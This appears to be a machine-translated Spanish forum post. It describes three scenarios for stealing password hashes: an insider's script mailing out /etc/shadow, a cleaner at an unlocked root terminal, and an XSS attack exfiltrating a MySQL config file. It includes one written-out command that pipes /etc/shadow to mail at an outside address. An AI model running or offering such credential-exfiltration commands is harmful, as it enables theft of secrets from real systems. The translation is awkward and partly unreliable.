Las personas con intenciones maliciosas podrían robar información confidencial (es decir, contraseñas) a través de los siguientes métodos.
Ejemplo: el pirata informático malintencionado toma un empleo para la empresa atacada como desarrollador en un contrato de 3 meses y recibe una cuenta de shell en un servidor con privilegios limitados y le pido al administrador del sistema que compruebe si hay un problema desconocido que dificulta mi trabajo. Logré persuadirlo para que me diera privilegios de root a un script de shell escrito por mí durante cinco minutos, ya que ayuda a personalizar el entorno de trabajo y acelera enormemente mi proyecto. Como está ocupado con otras cosas y tiene una reunión en diez minutos, me otorga privilegios de root
a mi script personalizado durante 10 minutos. He configurado una captura, el script malicioso se ejecuta con privilegios de raíz, que envía por correo electrónico el archivo /etc/shadow
a la cuenta de correo electrónico de mi empresa. Unas semanas más tarde, después de que haya otorgado el acceso a mi VPN, haré VPN desde la máquina de mi casa y recibiré una copia / pegado del correo electrónico de mi empresa en el escritorio de mi casa. Obtuve los hashes de contraseña.
- Acceso físico no autorizado a estaciones de trabajo
Ejemplo: un pirata informático malintencionado toma un empleo como limpiador para el negocio de limpieza que está subcontratando a los subcontratos de la empresa. Tiene acceso autorizado a las instalaciones del departamento de TI, incluido el administrador del sistema o el escritorio del jefe de desarrolladores. Busca contraseñas o información confidencial en notas post-it, o intenta encontrar estaciones de trabajo desbloqueadas, etc. Tarde o temprano encontrará una. Imagine la terminal abierta del administrador del sistema que accidentalmente dejó su terminal de shell abierta después de que se fue a casa de prisa. Por supuesto, los privilegios sudo
con root
acceso todavía están abiertos porque se había olvidado de bloquear su estación de trabajo ... mientras limpia su escritorio, limpia el polvo de su teclado, mira a su alrededor, nadie está mirando , toda la oficina está vacía, todos se habían ido a casa por el día. Rápidamente escribe cat /etc/shadow | mail [email protected]
y obtiene los hashes de contraseña.
Ejemplo: contra un servidor web mal protegido, un pirata informático malintencionado ejecuta un script XSS, donde la inyección de código ejecuta un comando que le envía por correo el archivo llamado /root/my.cnf
que el administrador del sistema había olvidado eliminar desde el servidor web. con MySQL se había configurado. Había pensado que su directorio HOME era seguro de todos modos, por lo que pensó que eliminar archivos, incluidas las contraseñas de HOME de root, no era una prioridad. La contraseña de MySQL es la misma que la contraseña root
en esa máquina. Con la contraseña de root, no es nada fácil obtener otra información confidencial para las contraseñas de otros servidores más protegidos.
Los métodos anteriores son, creo, no ingeniería social. Espero que esto ayude a ampliar su imaginación :)